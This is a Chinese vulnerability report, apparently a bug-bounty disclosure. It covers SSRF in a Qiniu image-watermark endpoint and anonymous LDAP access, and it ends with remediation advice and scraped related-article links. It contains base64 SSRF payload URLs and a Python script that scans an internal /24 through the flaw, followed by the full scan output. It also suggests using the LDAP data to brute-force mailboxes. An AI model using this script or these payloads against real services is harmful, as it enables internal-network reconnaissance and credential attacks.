一、SSRF漏洞

有漏洞的貌似是一个测试站:http://demos.qiniu.com/demo/qimage/index.html

存在SSRF漏洞接口的作用是先获取远程的图片,然后把图片制作成水印覆盖在当前图片上,用百度的logo做演示,效果如下:
http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUuY29tL2ltZy9iZF9sb2dvMS5wbmc=/dissolve/100/gravity/SouthEast

image后边的那串base64编码是你要探测的IP和端口,如何知道内网的IP呢。这里探测到七牛的一个IP存在elasticsearch未授权访问。

可知内网中至少存在这样一个网段:

172.30.251.168:9200

将http://172.30.251.168:9200编码为base64放在image后。

http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cDovLzE3Mi4zMC4yNTEuMTY4OjkyMDA=/dissolve/100/gravity/SouthEast

如果当前IP存活且端口开放的话,会返回501错误。如探测 http://172.30.251.168:9200

如果当前IP不存活或者端口不开放的话,会返回502错误。如探测 http://172.30.251.168:1356

经过测试总结出以下规律。

返回403——IP存活且端口开放,但是该目录禁止访问
返回404——IP存活且端口开放,但是不存在该图片
返回501——IP存活且端口开放
返回502——IP不存活或者端口不开放

这里为了方便测试,写了一个探测172.30.251网段80端口是否开放的脚本,返回501错误的就是IP存活且端口开放。当然如果再深入些,可以通过探测程序的默认logo或者favicon.ico来判断目标是什么应用。

#coding=utf-8
'''
poc: qiniu_ssrf
url: http://demos.qiniu.com/demo/qimage/index.html
'''
import requests
import base64
from IPy import IP
mask = IP('172.30.251.0/24')
for ip in mask:print ipb64Domain = base64.b64encode('http://' + str(ip))#print b64Domainreq = requests.get("http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/%s/dissolve/100/gravity/SouthEast" % b64Domain)print req.text + "\n"qnfile = file('/tmp/qnscan.txt', 'a')qnfile.write(str(ip) + '\n' + str(req.text) + '\n\n')qnfile.close()

这是返回的结果

172.30.251.0
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.1
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.2
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.3
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.4
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.5
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.6
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.7
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.8
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.9
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.10
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.11
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.12
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.13
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.14
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.15
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.16
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.17
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.18
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.19
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.20
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.21
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.22
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.23
{"error":"fetch image url failed and statusCode: 403"}
172.30.251.24
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.25
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.26
{"error":"fetch image url failed and statusCode: 403"}
172.30.251.27
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.28
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.29
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.30
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.31
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.32
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.33
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.34
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.35
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.36
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.37
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.38
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.39
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.40
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.41
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.42
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.43
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.44
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.45
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.46
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.47
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.48
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.49
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.50
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.51
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.52
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.53
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.54
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.55
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.56
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.57
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.58
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.59
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.60
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.61
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.62
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.63
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.64
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.65
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.66
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.67
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.68
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.69
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.70
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.71
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.72
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.73
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.74
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.75
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.76
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.77
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.78
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.79
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.80
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.81
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.82
{"error":"fetch image url failed and statusCode: 503"}
172.30.251.83
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.84
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.85
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.86
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.87
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.88
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.89
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.90
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.91
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.92
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.93
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.94
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.95
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.96
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.97
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.98
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.99
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.100
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.101
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.102
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.103
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.104
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.105
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.106
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.107
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.108
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.109
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.110
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.111
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.112
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.113
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.114
{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-23441q7XWC6pITgES': No such file or directory @ error/constitute.c/ReadImage/540"}
172.30.251.115
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.116
{"error":"fetch image url failed and statusCode: 404"}
172.30.251.117
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.118
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.119
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.120
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.121
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.122
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.123
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.124
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.125
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.126
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.127
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.128
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.129
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.130
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.131
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.132
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.133
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.134
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.135
{"error":"fetch image url failed and statusCode: 404"}
172.30.251.136
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.137
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.138
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.139
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.140
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.141
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.142
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.143
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.144
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.145
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.146
{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-5107kShQhExKivuz': No such file or directory @ error/constitute.c/ReadImage/540"}
172.30.251.147
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.148
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.149
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.150
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.151
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.152
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.153
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.154
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.155
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.156
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.157
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.158
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.159
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.160
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.161
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.162
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.163
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.164
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.165
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.166
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.167
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.168
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.169
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.170
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.171
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.172
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.173
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.174
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.175
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.176
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.177
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.178
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.179
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.180
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.181
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.182
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.183
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.184
{"error":"unsupported format:unsupported format:ERROR_CODER: Entity 'nbsp' not defined\n `No such file or directory` @ error/svg.c/SVGError/2639"}
172.30.251.185
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.186
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.187
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.188
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.189
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.190
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.191
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.192
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.193
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.194
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.195
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.196
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.197
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.198
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.199
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.200
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.201
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.202
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.203
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.204
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.205
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.206
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.207
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.208
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.209
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.210
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.211
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.212
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.213
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.214
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.215
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.216
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.217
{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-24069p9eQJObZhm7U': No such file or directory @ error/constitute.c/ReadImage/540"}
172.30.251.218
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.219
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.220
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.221
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.222
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.223
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.224
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.225
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.226
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.227
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.228
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.229
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.230
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.231
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.232
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.233
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.234
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.235
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.236
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.237
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.238
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.239
{"error":"fetch image url failed and statusCode: 404"}
172.30.251.240
{"error":"fetch image url failed and statusCode: 403"}
172.30.251.241
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.242
{"error":"fetch image url failed and statusCode: 403"}
172.30.251.243
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.244
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.245
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.246
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.247
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.248
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.249
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.250
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.251
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.252
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.253
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.254
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.255
{"error":"fetch image url failed and statusCode: 502"}

二、LDAP匿名访问

IP:115.231.182.75
端口:389

可获取企业的所有人员信息,利用这些信息可以用来爆破邮箱或者使用ldap登录的应用。

在测试时,你们搭的一个洋葱的应用(115.231.182.75:8090)因为有漏洞,不小心测挂掉了,实在是抱歉。

修复方案

1. SSRF漏洞,可以统一下返回错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态,且限制服务器访问的IP不能是内网IP。
2. Ldap漏洞,建议关掉Ldap的匿名访问功能。

【漏洞学习——SSRF】七牛某站SSRF可探测内网相关推荐

  1. Web安全之SQL注入漏洞学习(七)-堆叠注入

    堆叠注入简介 堆叠注入是指注入的多条SQL语句可以一起执行.MySQL命令行中, 每一条语句结尾加; 表示语句结束.这样是不是可以多句一起使用.这个叫做 stacked injection. 堆叠注入 ...

  2. 跨网段实现内网互通_【供暖站组网】冠航SD-LAN助力河北石家庄市30个供暖站异地组网实现内网互联互通...

    项目简介 北方地区几乎所有家庭都有暖气供应,数量和规模是非常巨大的,因此不合理不及时的处理冬季供暖的问题会产生很大的影响,目前供暖系统有以下特点: 1.供暖设备数量大且分散,无法集中管理. 2.需要人 ...

  3. SSRF 漏洞学习实战

    3x05 SSRF 漏洞学习实战 文章目录 3x05 `SSRF` 漏洞学习实战 一.ssrf漏洞概念 二.原理 三.SSRF漏洞的危害 四.漏洞检测点 五.ssrf漏洞绕过 六.ssrf漏洞的利用 ...

  4. 【漏洞学习——SSRF】小米某处SSRF漏洞(可内网SHELL 附多线程Fuzz脚本)

    漏洞细节 #1 存在漏洞位置,Discuz 论坛SSRF漏洞 http://www.miui.com/forum.php?mod=ajax&action=downremoteimg&m ...

  5. SSRF 漏洞危害大,应避免被利用攻击内网应用!| 原力计划

    作者 | Qwzf 责编 | 夕颜 头图 | CSDN付费下载自视觉中国 出品 | CSDN博客 前言 SSRF漏洞和CSRF漏洞有一些相似之处:CSRF跨站请求伪造,基于客户端的请求伪造:SSRF服 ...

  6. SSRF漏洞的利用与攻击内网应用

    首发于先知社区 0x00 前言 学过CSRF漏洞后,收获颇多.同时发现SSRF漏洞和CSRF漏洞有一点点类似之处. CSRF跨站请求伪造,基于客户端的请求伪造:SSRF服务器端请求伪造,基于服务端的请 ...

  7. ssrf漏洞内网渗透_渗透技巧之SSRF

    SSRF--服务端请求伪造,上一篇,我谈到了CSRF客户端请求伪造,这个是我们通过攻击用户,引诱客户点击我们伪造好的表单,从而达到我们攻击的目的,是从客户端发起的,那么SSRF服务端请求伪造当然是通过 ...

  8. WEB安全全基础漏洞学习

    本文省略了SQL注入和xss漏洞,需要的可以网上找资料,资料非常多 web安全全基础漏洞学习 CSRF 简介 跨站请求伪造 (Cross-Site Request Forgery, CSRF),也被称 ...

  9. 手把手带你用 SSRF 打穿内网

    靶场拓扑设计 首先来看下本次靶场的设计拓扑图: 先理清一下攻击流程,172.72.23.21 这个服务器的 Web 80 端口存在 SSRF 漏洞,并且 80 端口映射到了公网的 8080,此时攻击者 ...

  10. Java 七牛缓存刷新

    由于七牛提供的文档不怎么好懂(有的功能根本在api中在不到答案),另外百度搜索的答案也不尽如意.折腾了两天,终于搞懂了通过调用七牛提供的API去刷新缓存!! 场景:APP中关于帮助说明原先都是写死的h ...

最新文章

  1. Transformer 又立功了!又快(420 fps)又好的车道线检测算法
  2. php vbcrlf,我是这样打造自已的“菜刀”的,让一句话飞一会
  3. python模块大全使用说明_python模块详解
  4. pytorch torch.from_numpy()(从numpy数组创建一个张量,数组和张量共享相同内存)
  5. 命令行下操作MySQL数据库,各种命令的使用入门示例。(附图)
  6. access 使用dsn 连接字符串_致正在备考Access的你,学习重点和题库以及b站优课请查收!...
  7. iOS XMPP Framework 中文概述
  8. 利用谷歌翻译。帮助你的网站轻松实现多语言互换
  9. 【BZOJ】3495: PA2010 Riddle 2-SAT算法
  10. Log4J 日志的异步类解读(lAsyncAppender)
  11. python爬虫SSL: CERTIFICATE_VERIFY_FAILED解决方案
  12. IPFS python api 示例
  13. 【计算机网络安全基础(第五版)袁津生 课后习题答案】
  14. Perl 脚本命令行传入参数
  15. Vue3项目中使用AE+bodymovin+lottie的模式制作特效
  16. 正态分布、t分布、卡方分布、F分布的关系与差异
  17. 在C/C++中的struct使用函数指针,而且在C++中的struct还能使用成员函数
  18. 人工智能在音乐领域的应用概述(1)---听歌识曲
  19. ZigBee网络拓扑结构
  20. readelf命令和ELF文件详解

热门文章

  1. 软件测试脚本语言有哪些,测试脚本是什么意思有哪些脚本
  2. Vue 富文本编辑器
  3. 用Qt自己开发的 数学坐标绘图软件 可用于 论文,报告插图
  4. 阿里架构师墙裂推荐Java岗实战文档:Spring全家桶+Docker+Redis
  5. python按照绝对值排序_尝试使用python中的绝对值,按最接近零的值对列表进行排序...
  6. 华南技术盛会:BingoDay2017在天河人才港盛大举行
  7. PHP货币转中文大写函数
  8. 心率传感器MAX30102使用
  9. 国外浏览器无法访问apple ID页面,显示502 Bad Gateway,解决方法
  10. Chrome和Firefox的xpi与crx加载第三方dll